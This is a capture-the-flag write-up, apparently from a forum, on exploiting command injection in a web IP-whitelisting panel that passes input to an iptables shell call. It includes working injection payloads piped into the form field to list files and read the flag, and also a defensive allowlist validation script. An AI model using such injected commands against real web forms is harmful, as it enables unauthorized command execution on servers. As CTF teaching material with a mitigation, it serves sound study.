"Exploit Mozilla's IP Panel! This IP Panel is used for whitelisting IP addresses. We know that the web interface will call a bash script that will execute an iptables command without validation. Find the flag somewhere in /home/ippanel/ and submit it!"
So it's basically an issue with input validation of a text box. The input from the text box gets passed to something like a system("iptables $input"). The only validation that occurred here was that you can't use the letter "p" and the "/" character. "p" would get switched with " - trololololol, no p allowed :p -".
I started with a valid iptables command, "-L" and used the pipe command "|". In the input field, I put "-L | ls -hal" to get a directory listing. The output was "total 14", so this indicated that the output only prints the last line of whatever was returned from the system call.
To do a complete directory listing:
-L | ls -hal | head -1 | tail -1
-L | ls -hal | head -2 | tail -1
-L | ls -hal | head -3 | tail -1
-L | ls -hal | head -4 | tail -1
and so on until "head -14".
While doing the manual directory listing, I was thinking about how to overcome the challenge of changing my directory path into /home/ippanel/ since it has p's and forward slashes. I was going to simply substitute the p's with *, as in "cd i*anel". However, when I got done with the directory listing, I noticed the flag was already in the current working directory named "th15-15_th3_fl4g.txt".
Just cat the file and we're done:
"-L | cat th15-15_th3_fl4g.txt"
returns:
i1gALKeMunqCcyeVMud7TCbI
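The weakness above is a denylist ("p" and "/") on input that still reaches a shell. The sketch below is an added example, not the challenge's parser.sh or the author's code: it accepts only a strict IPv4 address and hands it to iptables as one quoted argument. The names is_ipv4, whitelist_ip and IPTABLES_CMD, and the ACCEPT rule shape, are assumptions.

```sh
#!/bin/sh
# Added sketch, not the challenge's parser.sh. IPTABLES_CMD, is_ipv4 and
# whitelist_ip are hypothetical names; the ACCEPT rule is an assumed rule shape.

# Dry run by default so this runs without root; set IPTABLES_CMD=iptables to apply.
IPTABLES_CMD="${IPTABLES_CMD:-echo iptables}"

# Succeed only for a strict dotted-quad IPv4 address (four octets, each 0-255).
is_ipv4() {
    addr=$1
    case "$addr" in
        # Allowlist: digits and dots only, no empty, leading or trailing fields.
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    count=0
    rest=$addr.
    while [ -n "$rest" ]; do
        octet=${rest%%.*}
        rest=${rest#*.}
        case "$octet" in
            ????*|0?*) return 1 ;;   # too long, or leading zero
        esac
        [ "$octet" -le 255 ] || return 1
        count=$((count + 1))
    done
    [ "$count" -eq 4 ]
}

# Build the rule from a fixed argv; the address is a single quoted argument.
whitelist_ip() {
    if ! is_ipv4 "$1"; then
        echo "rejected: not an IPv4 address" >&2
        return 1
    fi
    $IPTABLES_CMD -A INPUT -s "$1" -j ACCEPT
}

# Constructed sample inputs: one valid address plus the two strings from this page.
for input in '192.0.2.7' '-L | ls -hal' 'a | echo *'; do
    whitelist_ip "$input" || echo "refused: $input"
done
```

The web front end would also need to pass the field to the script as a single argument instead of interpolating it into a command string.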
A two-command way was this too:
"a | echo *"
that returns you this:
CSS index.php parser.sh th15-15_th3_fl4g.txt
and then
"a | cat th15-15_th3_fl4g.txt"
Both work great.
GZ you all!
@litsnarf, much simpler solution. Nice.